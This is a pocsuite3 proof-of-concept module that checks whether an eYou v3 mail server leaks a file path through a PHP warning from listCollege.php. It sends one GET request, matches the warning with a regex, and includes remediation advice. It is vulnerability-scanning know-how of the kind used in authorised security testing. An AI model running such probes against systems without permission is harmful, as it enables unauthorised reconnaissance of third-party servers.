"""
If you run into issues during development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
import re
class DemoPOC(POCBase):
    """pocsuite3 check for the eYou v3 ``listCollege.php`` path disclosure.

    Detection is a single GET of ``/user/send_queue/listCollege.php``. The
    target is reported when the response carries a PHP warning whose text
    embeds a file path. Only the probed URL is stored in the result; the
    disclosed path matched by the regex group is not recorded.

    Remediation for operators: keep PHP warnings out of HTTP responses
    (``display_errors`` off, log server-side instead) and fix the script so
    the invalid MySQL result resource is handled.
    """

    # PoC metadata.
    vulID = '1293'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2012-02-23'
    createDate = '2014-05-27'
    updateDate = '2014-05-27'
    references = ['']
    # English: "eYou v3 listCollege.php path disclosure vulnerability POC"
    name = 'eYou v3 listCollege.php 路径泄漏漏洞 POC'
    appPowerLink = 'http://www.eyou.com/'
    appName = 'eYou'
    appVersion = '3#'
    vulType = 'Path Disclosure'
    # English: "eYou/user/send_queue/listCollege.php leaks file path information."
    desc = '\neYou/user/send_queue/listCollege.php导致泄漏文件路径信息。\n'
    samples = []
    install_requires = ['']

    def _verify(self):
        """Request listCollege.php and report the target if it leaks a path.

        Returns the Output built by ``parse_output``: success with
        ``VerifyInfo['URL']`` set when both markers are present in the
        response body, otherwise fail.
        """
        verify_url = self.url + "/user/send_queue/listCollege.php"
        # NOTE(review): no explicit timeout is passed here; confirm the
        # framework's requests wrapper applies one.
        body = requests.get(verify_url).text

        # The PHP warning text carries the script's file path between <b> tags.
        leak = re.search(
            r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line',
            body,
        )
        # Second marker: the literal warning label, which confirms the match
        # sits in a rendered PHP warning.
        has_warning = '<b>Warning</b>:' in body

        result = {'VerifyInfo': {'URL': verify_url}} if leak and has_warning else {}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap *result* in an Output: success if non-empty, otherwise fail."""
        report = Output(self)
        if not result:
            report.fail('target is not vulnerable')
            return report
        report.success(result)
        return report

    def _attack(self):
        """Attack mode is an alias for the check; it issues the same GET only."""
        return self._verify()
# Hand the PoC class to pocsuite3's register_poc when this module is imported
# (presumably how the framework discovers and runs it; confirm against the API docs).
register_poc(DemoPOC)